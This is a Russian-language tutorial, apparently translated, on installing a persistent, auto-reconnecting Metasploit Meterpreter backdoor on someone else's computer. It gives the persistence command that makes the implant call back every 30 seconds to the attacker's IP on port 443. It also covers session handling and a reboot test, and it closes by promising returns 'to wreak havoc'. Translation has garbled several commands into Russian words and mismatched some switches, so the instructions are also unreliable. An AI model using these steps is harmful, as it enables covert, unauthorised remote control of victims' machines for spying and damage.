Как удаленно установить автоматически переподключаемый постоянный бэкдор на чужой компьютер
Большинство моих последних публикаций были посвящены использованию Meterpreter от Metasploit и тому, что можно сделать после его внедрения в систему жертвы. Это включает в себя удалённую установку кейлоггера, включение веб-камеры, включение микрофона и записи, а также отключение антивируса и многое другое. Список практически бесконечен.К сожалению, Meterpreter перестаёт работать после перезагрузки системы-жертвы. В связи с этим многие из вас писали мне, спрашивая, можем ли мы сохранить Meterpreter на системе-жертве.
Ответ — однозначное «Да!»
Мы можем внедрить Meterpreter, а затем вернуться позже — даже после перезагрузки компьютера жертвы — и снова подключиться к нашему маленькому бэкдору или прослушивателю. В этой статье я покажу вам, как это сделать.
Начало работы
Предположим, вам удалось внедрить Meterpreter в систему жертвы, и ваш экран выглядит так, как показано на скриншоте ниже. Если вы не знаете, как это сделать, ознакомьтесь с моими предыдущими публикациями.Итак, начнем.
Шаг 1: Запуск сценария сохранения
В Metasploit есть скрипт persistence, который позволяет настроить постоянный Meterpreter (прослушиватель) в системе жертвы. Для начала давайте рассмотрим параметры, доступные при запуске этого скрипта с ключом –h. В командной строке Meterpreter введите следующее:meterpreter > запустить persistence -h
На снимке экрана выше мы видим, что…
- –Коммутатор запускает соответствующий обработчик для подключения к агенту.
- С помощью ключа -L мы сообщаем системе, где разместить Meterpreter в целевой системе.
- Параметр –P указывает системе, какую полезную нагрузку использовать (по умолчанию используется Windows/Meterpreter/reverse_tcp, поэтому мы не будем использовать этот параметр).
- -S запускает агент при загрузке с системными привилегиями.
- Параметр -U запускает агент при входе пользователя (U) в систему.
- Ключ -x запускает агент при загрузке системы.
- С помощью ключа –i мы можем указать временной интервал между попытками подключения.
- Параметр -p указывает порт, и наконец…
- Параметр –r указывает IP-адрес нашей (r) системы, на которой работает Metasploit.
Введите в командной строке Meterpreter:
meterpreter >запустить сохранение –A –L c:\ -X 30 –p 443 –r 192.168.1.113
Затем эта команда запустит сценарий сохранения, который запустит соответствующий обработчик (-A), поместит Meterpreter в c:\ на целевой системе (-L c:\), запустит прослушиватель при загрузке системы (-x), будет проверять каждые 30 секунд наличие соединения (-i 30), подключится к порту 443 (-p 443) и подключится к локальной системе (нашей) по IP-адресу 192.168.1.113.
Шаг 2: Открытие второго сеанса
Мы видим, что мы открыли сеанс Meterpreter на зараженной системе.Возвращаемся к командной строке Metasploit, введя:
meterpreter > фон
Это вернет нас к командной строке msf, где теперь можно ввести:
эксплойт msf(ms08_067_netapi) > сеансы –i
Выше мы видим, что теперь на системе-жертве запущено два или более сеансов (на самом деле на этой жертве запущено три сеанса), поскольку постоянный Meterpreter открыл в системе второй сеанс.
Шаг 3: Тестирование
Всё это очень здорово, но ключевой момент — сможет ли Meterpreter повторно подключиться к нашей системе даже после перезагрузки целевой системы. Мы можем проверить это, введя:meterpreter > перезагрузка
Это перезагрузит целевую/жертвенную машину, и если все пройдет успешно, Meterpreter снова подключится к нашей системе.
Даже после перезагрузки системы Meterpreter на зараженной системе пытается подключиться к нам каждые 30 секунд, пока успешно не откроет сеанс для нас.
Теперь мы успешно открыли постоянное соединение на зараженной системе, к которому мы можем возвращаться снова и снова, чтобы сеять хаос!
